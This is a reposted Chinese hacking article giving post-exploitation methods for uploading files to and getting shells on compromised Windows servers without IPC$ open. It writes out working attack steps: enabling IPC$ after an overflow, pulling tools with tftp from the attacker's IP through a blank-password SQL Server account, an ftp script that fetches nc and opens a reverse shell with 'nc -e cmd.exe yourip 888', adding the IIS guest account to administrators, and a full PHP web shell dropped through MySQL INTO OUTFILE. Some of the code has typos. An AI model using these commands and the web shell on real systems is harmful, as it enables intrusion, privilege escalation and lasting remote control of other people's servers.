对于没有开IPC$的主机 上传下载的一些思路

/ns/hk/hacker/data/20071230124648.htm

比如用溢出攻击得到权限 发现没有开139 or 445 我们可以从内部make it崩溃:
1.net share ipc$
例如,使用webdav溢出得到system net share 看一下 没有任何东西 用什么东西都连不上 所以 要先打开ipc$――net share ipc$
剩下的你愿意使用什么就可以了,比如dameware.

2.tftp.exe
获得sa空口令,使用sqlexec链接,只开了80和1433怎么办?别忘了,你是在内部控制他,防火墙是可以从内部突破的。
打开本地的tftp server 然后在sqlexec中输入
tftp -i yourip get files
就可以了。

3.ftp 脚本 + nc
比如从80端口溢出后可以,写一个ftp的脚本然后用ftp -s ftp.txt从你的ftp下载nc。在溢出的命令提示符下使用nc
nc -e c:\winnt\system32\cmd.exe yourip 888
在本地命令提示符下
nc -l -p 888 -vv


4.iusr_xx 高权限的cmd.asp
有运气的成分,80端口溢出,net localgroup administrators iusr_computername /add
用echo 写一个cmd.asp……

5.使用mysql写的cmd.php
我转再过一篇文章 再贴一次
通过mysql入侵
1、在默认的mysql数据库中生成一个叫tmp的表,只有一个字段名,叫cmd,数据类型为text(可以不分大

小写)
use mysql
create table tmp(cmd text)
2、在tmp表cmd字段中写入一段php代码(注意这个文件导出后一定要叫cmd2.php)
insert into tmp values(<|><body onload=document.form1.cmd.focus()>
<?if (isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd>temp.dat\");}?>
<style type=\"text.css\">
<!\-\-.form1
{background:#ffffff;border-bottom:#666666 1px solid;border-left:#666666 1px solid;border-

right:#666666 1px solid;border-top:#666666 1px solid;color:#3c464f;font-size:9pt;clip:rect

();cursor:text;height:auto;width:auto;margin-top:0px;margin-right:0px;margin-

bottom:0px;margin-left:0px}
\-\-></style><p class=\"title\"> </p><form name=\"form1\" method=\"post\"

action=\"/cmd2.php\"><input type=\"text\" name\"cmd\" size=\"50\" class=\"form1

\"></from><form name=\"\form2" method=\"post\" action=\"\"><p><textarea name=\"text\"

cols=\"120\" row=\"50\" class=\"form1\"><?if
(isset($cmd)){readfile(\"temp.dat\");unlink(\"text.dat\");}?></textarea></p></form></body>
写入到你刚才看见的web实际目录中(要注意的问题是直接写到你刚才看到的路径中可并不能直接访问到

cmd2.php,你可以从里往外多试试)
select * form tmp into outfile <|>d:\\path\\cmd2.php<|>;
删除 tmp表
drop table tmp;
3、访问cmd2.php
这是你将得到的web shell是system身份的!


6.telnet
用opentelnet的脚本

7.同一防火墙内另一主机的辅助入侵
有时候一些主机使用的是硬防火墙,很多主机躲在一个防火墙下面,它们之间是彼此无保护的,如果你成功的入侵了一台内网主机,你就可以实现向其他主机进军。

8.一些发送到80端口的脚本
正在搜集……

9.正在想
……


=========================
文章类型:转载 提交:a32232a 核查:NetDemon